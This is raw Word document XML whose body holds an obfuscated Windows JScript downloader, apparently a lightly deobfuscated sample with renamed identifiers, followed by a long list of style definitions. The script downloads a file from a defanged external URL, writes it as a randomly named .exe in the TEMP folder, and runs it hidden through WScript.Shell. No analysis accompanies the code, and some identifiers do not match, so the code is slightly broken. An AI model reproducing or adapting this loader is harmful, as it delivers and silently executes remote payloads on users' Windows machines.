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widowControl w:val="false"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(function(_0x4f7733, _0x9ac3d3) {</w:t>
      </w:r>
      <w:r/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="false"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">_0x54d738 = _0x4f7733();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ab/>
        <w:t xml:space="preserve">while (!![]) {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 xml:space="preserve">    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">try {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 xml:space="preserve">        </w:t>
        <w:tab/>
        <w:t xml:space="preserve">var _0x3db72c = parseInt(__GetArrayElement_ByIn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dex(495)) / 1 * (parseInt(__GetArrayElement_ByIndex(485)) / 2) + parseInt(__GetArrayElement_ByIndex(499)) / 3 * (parseInt(__GetArrayElement_ByIndex(505)) / 4) + -parseInt(__GetArrayElement_ByIndex(496)) / 5 * (parseInt(__GetArrayElement_ByIndex(500)) / 6) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">+ parseInt(__GetArrayElement_ByIndex(502)) / 7 * (-parseInt(__GetArrayElement_ByIndex(48</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">9)) / 8) + -parseInt(__GetArrayElement_ByIndex(503)) / 9 * (-parseInt(__GetArrayElement_ByIndex(493)) / 10) + -parseInt(__GetArrayElement_ByIndex(515)) / 11 + -parseInt(__GetArrayElement_ByIndex(488)) / 12 * (parseInt(__GetArrayElement_ByIndex(512)) / 13);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 xml:space="preserve">        </w:t>
        <w:tab/>
        <w:t xml:space="preserve">if (_0x3db72c === _0x9ac3d3) break;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 xml:space="preserve">        </w:t>
        <w:tab/>
        <w:t xml:space="preserve">else _0x54d738['push'](_0x54d738['shift']());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 xml:space="preserve">    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">} catch (_0x31c89a) {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 xml:space="preserve">        </w:t>
        <w:tab/>
        <w:t xml:space="preserve">_0x54d738['push'](_0x54d738['shift']());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 xml:space="preserve">    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">}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ab/>
        <w:t xml:space="preserve">}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 xml:space="preserve">}(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">__StoreMaliciousCommands</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, 0x7bbe1));</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="false"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="false"/>
        <w:keepLines w:val="false"/>
        <w:pageBreakBefore w:val="false"/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76" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="false"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">function __StoreMaliciousCommands() {</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="false"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">ar _0x44cf17 = ['161388RPSeXo', '%TEMP%', '.exe', '492TCvoTF', '10472DzuRbO', 'MSXML2.XMLHTTP', 'Scripting.FileSystemObject', 'open', '2591450LelUFW', 'Open', '11DdyEIT', '143705KPLLVg', 'Position', 'CreateObject', '811974EpasyL', '12YWhdLu', 'ExpandEnviro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">nmentStrings', '161niwgeO', '9momQLi', 'send', '4jtkQWe', 'WScript.Shell', 'substring', 'Close', 'random', 'Write', 'ResponseBody', '70239FHGPwr', 'status', 'Type', '6616236zGcHfF', 'Run'];</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="false"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">_0x44cf17;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 xml:space="preserve">}</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="false"/>
        <w:keepLines w:val="false"/>
        <w:pageBreakBefore w:val="false"/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76" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="false"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="false"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="false"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">function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__GetArrayElement_ByIndex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(_0x2cd2a4, _0x105e15) {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ab/>
        <w:t xml:space="preserve">var arr_MaliciousCommand = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">__StoreMaliciousCommands</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">();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ab/>
        <w:t xml:space="preserve">return _initial_launchFunc = function(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">one_index</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) {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 xml:space="preserve">    </w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">var new_index = one_index - 485;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="false"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">var _0x5d8691 =  arr_MaliciousCommand[new_index];</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="false"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">return _0x5d8691;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ab/>
        <w:t xml:space="preserve">}, _initial_launchFunc(_0x2cd2a4, _0x105e15);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 xml:space="preserve">}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 xml:space="preserve">try {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ab/>
        <w:t xml:space="preserve">var shell = WScript['CreateObject'](__initial_launchFunc_val(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">506</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)),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 xml:space="preserve">    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">fso = WScript[__initial_launchFunc_val(498)](__initial_launchFunc_val(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">491</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)),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 xml:space="preserve">    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">tempFolder = shell[__initial_launchFunc_val(501)](__initial_launchFunc_val(486)),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 xml:space="preserve">    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">randomName = Math[__initial_launchFunc_val(509)]()['toString'](36)[__initial_launchFunc_val(507)](2, 10) + __initial_launchFunc_val(487),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 xml:space="preserve">    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">filePath = tempFolder + '\x5c' + randomName,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 xml:space="preserve">    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">fileUrl = 'hxxp://u[.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">]to//6AgGIg',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 xml:space="preserve">    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">xhr = WScript[__initial_launchFunc_val(498)](__initial_launchFunc_val(490));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ab/>
        <w:t xml:space="preserve">xhr[__initial_launchFunc_val(492)]('GET', fileUrl, ![]), xhr[__initial_launchFunc_val(504)]();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ab/>
        <w:t xml:space="preserve">if (xhr[__initial_launchFunc_val(513)] === 200) {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 xml:space="preserve">    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">var stream = WScript[__initial_launchFunc_val(498)]('ADODB.Stream');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 xml:space="preserve">    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">stream[__initial_launchFunc_val</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(494)](), stream[__initial_launchFunc_val(514)] = 0x1, strea</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">m[__initial_launchFunc_val(510)](xhr[__initial_launchFunc_val(511)]), stream[__initial_launchFunc_val(497)] = 0, stream['SaveToFile'](filePath, 2), stream[__initial_launchFunc_val(508)](), shell[__initial_launchFunc_val(516)]('”' + filePath + '”', 0, ![]);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ab/>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="false"/>
        <w:keepLines w:val="false"/>
        <w:pageBreakBefore w:val="false"/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76" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">} catch (_0x5584ac) {}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="false"/>
        <w:keepLines w:val="false"/>
        <w:pageBreakBefore w:val="false"/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76" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="false"/>
        <w:keepLines w:val="false"/>
        <w:pageBreakBefore w:val="false"/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76" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:sectPr>
      <w:headerReference w:type="default" r:id="rId8"/>
      <w:footnotePr/>
      <w:endnotePr/>
      <w:type w:val="nextPage"/>
      <w:pgSz w:h="15840" w:orient="portrait" w:w="12240"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="0" w:footer="720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Georgia">
    <w:panose1 w:val="02040502050405020303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69"/>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
      <w:rPr/>
    </w:pPr>
    <w:r/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</w:rPr>
    </w:rPrDefault>
    <w:pPrDefault>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="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3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Table Grid"/>
    <w:basedOn w:val="713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Table Grid Light"/>
    <w:basedOn w:val="713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1"/>
    <w:basedOn w:val="713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2"/>
    <w:basedOn w:val="713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Plain Table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Plain Table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Plain Table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1 Light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1 Light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2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2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3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3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1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2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3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4 - Accent 4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 - Accent 5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4 - Accent 6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5 Dark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5 Dark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5 Dark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6 Colorful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6 Colorful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6 Colorful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7 Colorful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7 Colorful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7 Colorful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1 Light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1 Light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1 Light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2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2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2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3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3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3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4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4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4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5 Dark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5 Dark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5 Dark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6 Colorful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6 Colorful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7 Colorful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7 Colorful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1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2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 3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ned - Accent 4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ned - Accent 5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ned - Accent 6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1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2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 3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&amp; Lined - Accent 4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&amp; Lined - Accent 5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&amp; Lined - Accent 6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0">
    <w:name w:val="Heading 7"/>
    <w:basedOn w:val="893"/>
    <w:next w:val="893"/>
    <w:link w:val="85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1">
    <w:name w:val="Heading 8"/>
    <w:basedOn w:val="893"/>
    <w:next w:val="893"/>
    <w:link w:val="85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2">
    <w:name w:val="Heading 9"/>
    <w:basedOn w:val="893"/>
    <w:next w:val="893"/>
    <w:link w:val="85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3" w:default="1">
    <w:name w:val="Default Paragraph Font"/>
    <w:uiPriority w:val="1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:styleId="844" w:default="1">
    <w:name w:val="No List"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="845">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="843"/>
    <w:link w:val="89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6">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="843"/>
    <w:link w:val="89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7">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="843"/>
    <w:link w:val="8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8">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="843"/>
    <w:link w:val="89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9">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="843"/>
    <w:link w:val="89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0">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="843"/>
    <w:link w:val="90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1">
    <w:name w:val="Heading 7 Char"/>
    <w:basedOn w:val="843"/>
    <w:link w:val="84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2">
    <w:name w:val="Heading 8 Char"/>
    <w:basedOn w:val="843"/>
    <w:link w:val="84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3">
    <w:name w:val="Heading 9 Char"/>
    <w:basedOn w:val="843"/>
    <w:link w:val="84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4">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="843"/>
    <w:link w:val="90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55">
    <w:name w:val="Subtitle Char"/>
    <w:basedOn w:val="843"/>
    <w:link w:val="90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6">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="893"/>
    <w:next w:val="893"/>
    <w:link w:val="85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7">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="843"/>
    <w:link w:val="85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8">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="893"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind w:left="720"/>
      <w:contextualSpacing w:val="true"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="859">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="84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0">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="893"/>
    <w:next w:val="893"/>
    <w:link w:val="86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1">
    <w:name w:val="Intense Quote Char"/>
    <w:basedOn w:val="843"/>
    <w:link w:val="86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2">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="84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63">
    <w:name w:val="No Spacing"/>
    <w:basedOn w:val="893"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="864">
    <w:name w:val="Subtle Emphasis"/>
    <w:basedOn w:val="84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5">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="843"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="866">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="843"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="867">
    <w:name w:val="Subtle Reference"/>
    <w:basedOn w:val="84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8">
    <w:name w:val="Book Title"/>
    <w:basedOn w:val="843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9">
    <w:name w:val="Header"/>
    <w:basedOn w:val="893"/>
    <w:link w:val="87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0">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="843"/>
    <w:link w:val="869"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="871">
    <w:name w:val="Footer"/>
    <w:basedOn w:val="893"/>
    <w:link w:val="87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2">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="843"/>
    <w:link w:val="871"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="873">
    <w:name w:val="Caption"/>
    <w:basedOn w:val="893"/>
    <w:next w:val="89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4">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="893"/>
    <w:link w:val="87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5">
    <w:name w:val="Footnote Text Char"/>
    <w:basedOn w:val="843"/>
    <w:link w:val="874"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="876">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="843"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="877">
    <w:name w:val="endnote text"/>
    <w:basedOn w:val="893"/>
    <w:link w:val="87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8">
    <w:name w:val="Endnote Text Char"/>
    <w:basedOn w:val="843"/>
    <w:link w:val="877"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="879">
    <w:name w:val="endnote reference"/>
    <w:basedOn w:val="843"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="880">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="84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1">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="84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2">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="893"/>
    <w:next w:val="893"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="883">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="893"/>
    <w:next w:val="893"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="884">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="893"/>
    <w:next w:val="893"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="885">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="893"/>
    <w:next w:val="893"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="660"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="886">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="893"/>
    <w:next w:val="893"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="880"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="887">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="893"/>
    <w:next w:val="893"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="1100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="888">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="893"/>
    <w:next w:val="893"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="1320"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="889">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="893"/>
    <w:next w:val="893"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="1540"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="890">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="893"/>
    <w:next w:val="893"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="1760"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="891">
    <w:name w:val="TOC Heading"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="892">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="893"/>
    <w:next w:val="893"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:afterAutospacing="0"/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="893" w:default="1">
    <w:name w:val="Normal"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="894">
    <w:name w:val="Table Normal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5">
    <w:name w:val="Heading 1"/>
    <w:basedOn w:val="893"/>
    <w:next w:val="893"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines w:val="true"/>
      <w:pageBreakBefore w:val="false"/>
      <w:pBdr/>
      <w:spacing w:after="120" w:before="480"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="896">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="893"/>
    <w:next w:val="893"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines w:val="true"/>
      <w:pageBreakBefore w:val="false"/>
      <w:pBdr/>
      <w:spacing w:after="80" w:before="360"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="897">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="893"/>
    <w:next w:val="893"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines w:val="true"/>
      <w:pageBreakBefore w:val="false"/>
      <w:pBdr/>
      <w:spacing w:after="80" w:before="280"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="898">
    <w:name w:val="Heading 4"/>
    <w:basedOn w:val="893"/>
    <w:next w:val="893"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines w:val="true"/>
      <w:pageBreakBefore w:val="false"/>
      <w:pBdr/>
      <w:spacing w:after="40" w:before="240"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="899">
    <w:name w:val="Heading 5"/>
    <w:basedOn w:val="893"/>
    <w:next w:val="893"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines w:val="true"/>
      <w:pageBreakBefore w:val="false"/>
      <w:pBdr/>
      <w:spacing w:after="40" w:before="220"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="900">
    <w:name w:val="Heading 6"/>
    <w:basedOn w:val="893"/>
    <w:next w:val="893"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines w:val="true"/>
      <w:pageBreakBefore w:val="false"/>
      <w:pBdr/>
      <w:spacing w:after="40" w:before="200"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="901">
    <w:name w:val="Title"/>
    <w:basedOn w:val="893"/>
    <w:next w:val="893"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines w:val="true"/>
      <w:pageBreakBefore w:val="false"/>
      <w:pBdr/>
      <w:spacing w:after="120" w:before="480"/>
      <w:ind/>
